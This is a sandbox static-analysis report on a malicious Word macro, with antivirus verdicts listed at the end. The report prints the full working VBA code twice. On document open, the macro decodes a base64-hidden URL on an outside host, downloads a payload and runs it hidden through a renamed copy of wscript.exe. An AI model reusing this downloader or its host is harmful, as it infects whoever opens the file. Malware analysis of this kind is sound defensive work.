popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

Original

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Deobfuscated

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Original

                                        Attribute VB_Name = "NewMacros"



Function kujgedrfgbasdfg(ByVal base64String)
On Error Resume Next
     Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
     Dim dataLength, sOut, groupBegin
     base64String = Replace(base64String, vbCrLf, "")
     base64String = Replace(base64String, vbTab, "")
     base64String = Replace(base64String, " ", "")
     dataLength = Len(base64String)
     For groupBegin = 1 To dataLength Step 4
          Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
          numDataBytes = 3
          nGroup = 0
          For CharCounter = 0 To 3
               thisChar = Mid(base64String, groupBegin + CharCounter, 1)
               If thisChar = "=" Then
                    numDataBytes = numDataBytes - 1
                    thisData = 0
               Else
                    thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
               End If
               If thisData = -1 Then
                    Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
                    Exit Function
               End If
               nGroup = 64 * nGroup + thisData
          Next
          nGroup = Hex(nGroup)
          nGroup = String(6 - Len(nGroup), "0") & nGroup
          pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 5, 2)))
          sOut = sOut & Left(pOut, numDataBytes)
     Next
     kujgedrfgbasdfg = sOut
End Function



Sub AutoOpen()
On Error Resume Next

    sCmdLine = "cmd /c copy %windir%\system32\wscript.exe %appdata%\word.exe"
    n = Shell(sCmdLine, vbHide)
    
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set WshShell = CreateObject("Wscript.shell")
    
    drl = kujgedrfgbasdfg("aHR0cHM6Ly9wYXJ0bmVyMjQua3IvbW9rb3p5L2hvcGUva2sucGhw=")
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", drl, False
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chnome/97.0.4692.99 Safari/537.36"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
    
        responseText = WinHttpReq.responseText
        
        strPath = WshShell.expandenvironmentstrings("%USERPROFILE%") & "\set.sl"
        Set File = FSO.CreateTextFile(strPath, True)
        File.Write (kujgedrfgbasdfg(responseText))
        File.Close
        
        sCmdLine = "cmd /c %appdata%\word.exe //e:vbscript //b %USERPROFILE%\set.sl"
        n = Shell(sCmdLine, vbHide)
        
    End If
    ActiveDocument.Content.Font.ColorIndex = wdBlack
    ActiveDocument.Save
End Sub

Deobfuscated

                                        Attribute VB_Name = "NewMacros"



Function kujgedrfgbasdfg(ByVal base64String)
On Error Resume Next
     Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
     Dim dataLength, sOut, groupBegin
     base64String = Replace(base64String, vbCrLf, "")
     base64String = Replace(base64String, vbTab, "")
     base64String = Replace(base64String, " ", "")
     dataLength = Len(base64String)
     For groupBegin = 1 To dataLength Step 4
          Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
          numDataBytes = 3
          nGroup = 0
          For CharCounter = 0 To 3
               thisChar = Mid(base64String, groupBegin + CharCounter, 1)
               If thisChar = "=" Then
                    numDataBytes = numDataBytes - 1
                    thisData = 0
               Else
                    thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
               End If
               If thisData = -1 Then
                    Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
                    Exit Function
               End If
               nGroup = 64 * nGroup + thisData
          Next
          nGroup = Hex(nGroup)
          nGroup = String(6 - Len(nGroup), "0") & nGroup
          pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 5, 2)))
          sOut = sOut & Left(pOut, numDataBytes)
     Next
     kujgedrfgbasdfg = sOut
End Function



Sub AutoOpen()
On Error Resume Next

    sCmdLine = "cmd /c copy %windir%\system32\wscript.exe %appdata%\word.exe"
    n = Shell(sCmdLine, vbHide)
    
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set WshShell = CreateObject("Wscript.shell")
    
    drl = kujgedrfgbasdfg("aHR0cHM6Ly9wYXJ0bmVyMjQua3IvbW9rb3p5L2hvcGUva2sucGhw=")
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", drl, False
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chnome/97.0.4692.99 Safari/537.36"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
    
        responseText = WinHttpReq.responseText
        
        strPath = WshShell.expandenvironmentstrings("%USERPROFILE%") & "\set.sl"
        Set File = FSO.CreateTextFile(strPath, True)
        File.Write (kujgedrfgbasdfg(responseText))
        File.Close
        
        sCmdLine = "cmd /c %appdata%\word.exe //e:vbscript //b %USERPROFILE%\set.sl"
        n = Shell(sCmdLine, vbHide)
        
    End If
    ActiveDocument.Content.Font.ColorIndex = wdBlack
    ActiveDocument.Save
End Sub
[Content_Types].xml
L:Po0Cy
$SmDt_
_rels/.rels
word/_rels/document.xml.rels
X=c+(\
word/document.xml
'D<PE@
U-R$N&
aHR)8V"
word/vbaProject.bin
0.B(F(A(E(C
AQAR?R
vWa=:k
V8i2[@=
nDgB]LU
6B34A#
U0r?:r
4il}b;
-5LL,}
wD~vD!?;r
;HObRP
mK`w Y
`)kklj
N!bhYs
w",HzU
+ZI^iRy
^~-$#O
oNx,nE
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/theme/theme1.xml
_N?>}
zY(6i4[
word/vbaData.xml
word/settings.xml
O2fnfMI
!Bpq]WP+?
docProps/app.xml
jEuY,>
4^gxIf[
word/styles.xml
oNx,nE
]6S*OT
E!%'b}
=':=da
biDC{Hyy
'nB[ZB
Pz:1xa
docProps/core.xml
fO.1qF
HZ1.79z[-
K$#e%!G
word/fontTable.xml
ji1X8ox
<_i4+!
word/webSettings.xml
kP&"OI
[Content_Types].xmlPK
_rels/.relsPK
word/_rels/document.xml.relsPK
word/document.xmlPK
word/vbaProject.binPK
word/_rels/vbaProject.bin.relsPK
word/theme/theme1.xmlPK
word/vbaData.xmlPK
word/settings.xmlPK
docProps/app.xmlPK
word/styles.xmlPK
docProps/core.xmlPK
word/fontTable.xmlPK
word/webSettings.xmlPK
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
DrWeb Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Trojan.Downloader.DOC.Gen
Malwarebytes Clean
VIPRE Trojan.GenericKD.68409886
Sangfor Clean
K7AntiVirus Clean
Alibaba TrojanDownloader:Script/Kimsuky.ce514c70
K7GW Clean
Arcabit HEUR.VBA.Trojan.d
BitDefenderTheta Clean
Cyren PP97M/Agent.AFL.gen!Eldorado
Symantec CL.Downloader!gen175
ESET-NOD32 VBS/Kimsuky.P
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.68409886
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
MicroWorld-eScan Trojan.GenericKD.68409886
Tencent Trojan.MsOffice.MacroS.11009378
Sophos Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Artemis!Trojan
FireEye Trojan.GenericKD.68409886
Emsisoft Trojan.GenericKD.68409886 (B)
SentinelOne Static AI - Malicious OPENXML
Avast-Mobile Clean
Jiangmin WM/Downloader.a
Avira W2000M/NPE.Minerva.fmbdg
MAX malware (ai score=80)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Microsoft Trojan:Win32/Leonem
ViRobot Clean
ZoneAlarm HEUR:Trojan-Downloader.MSOffice.SLoad.gen
GData Macro.Trojan.Agent.8D3DSM
Google Detected
AhnLab-V3 Downloader/DOC.Generic
Acronis suspicious
McAfee Clean
TACHYON Suspicious/WOX.XSR.Gen
VBA32 Clean
Zoner Clean
Rising Macro.Agent.cg (CLASSIC)
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Drp]
Panda Clean
No IRMA results available.